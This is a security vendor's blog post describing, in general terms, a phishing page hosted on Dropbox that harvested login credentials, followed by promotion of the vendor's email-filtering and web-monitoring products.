Talk about a meta sort of attack! Dropbox recently detected and shut down a spoofing page designed to grab users’ credentials to Dropbox and other webmail based systems that was hosted on Dropbox itself. Hosting a fake login page within the Dropbox service itself, the attacker or attackers leveraged a number of things to help convince victims that they were visiting a legitimate page, rather than falling victim to a hoax. Here’s how it worked.
The attackers created a well-designed web page, hosted on Dropbox itself in a user account set up for the purpose, and that looks like a legitimate Dropbox login page. They then sent emails to victims, informing them that someone tried to send them a large file, and advising them to click a link in the email to access the data. Of course, no one should click a link in an email they are not expecting, but we all know that users continue to do so. Since the URL was within a Dropbox domain, even clever users who copy and paste, or manually type in a URL, might see this as legitimate. The hoax page was accessible over HTTPS, since it was hosted in a user’s Dropbox, so many users would only see that the padlock icon displayed and assume that they were safe. As some elements were accessed over HTTP, some browsers might warn users that not all content is secure, but that is too common a failing of legitimate sites, and nothing to count on to prevent users from doing bad things.
The form prompted users for their credentials, using either their Dropbox account or one of the popular webmail providers. After harvesting credentials, the page simply redirected users to Dropbox’s own login page, much like you might see when a webpage malfunctions.
Dropbox quickly detected and disabled access to the hoax page, and should be commended for their detection, rapid response and disclosure of the event, but all of that is reactionary, and some users may have become victims. As sysadmins, we need to be more proactive in how we defend users from these sorts of attacks.
To succeed, phishing messages have to get through to victims’ mailboxes. Proper mail filtering solutions can and should be used to detect and block phishing attacks like this. GFI MailEssentials can be used to not only filter out spam and malware, but also to detect and block phishing messages before they even get to your users. If there is no phishing message in their inbox, there is nothing for them to click on!
But the best defenses are layered ones, and should a phishing message get through to your users, you don’t want their own best judgment to be the only other protection. GFI WebMonitor offers active scanning of all downloads and blocks access to known harmful websites, like those that host malware, or are known phishing domains. By protecting users from compromised and malicious websites, you can protect them whether an email with a link gets through, they manually type in a URL, or they try to visit a legitimate site that fell victim to a compromise and is now serving malware.
Finally, it is worth mentioning that GFI MailArchiver offers archiving of both email and files. Using the File Archive Assistant, companies can manage and access important company files and email easily, and store them securely in an instantly accessible, compliant archive. The beauty of this is that users do not have to store and retrieve files from Dropbox or other cloud-based storage services. Furthermore, from a compliance perspective, you get a comprehensive audit trail and retention policy features. This lowers risk but connects global employees and simplifies how they work together.
While this clever attack was quickly shut down by Dropbox, it won’t be the last time some clever attacker uses a system to take advantage of victims. Blocking all access to all external solutions is no solution at all, as many of these, Dropbox included, offer fantastic capabilities to users and businesses alike, but you have to provide access in a safe and secure manner. Combining GFI MailEssentials with GFI WebMonitor gives you the one-two punch you need to knock out the opposition before they make victims of your users!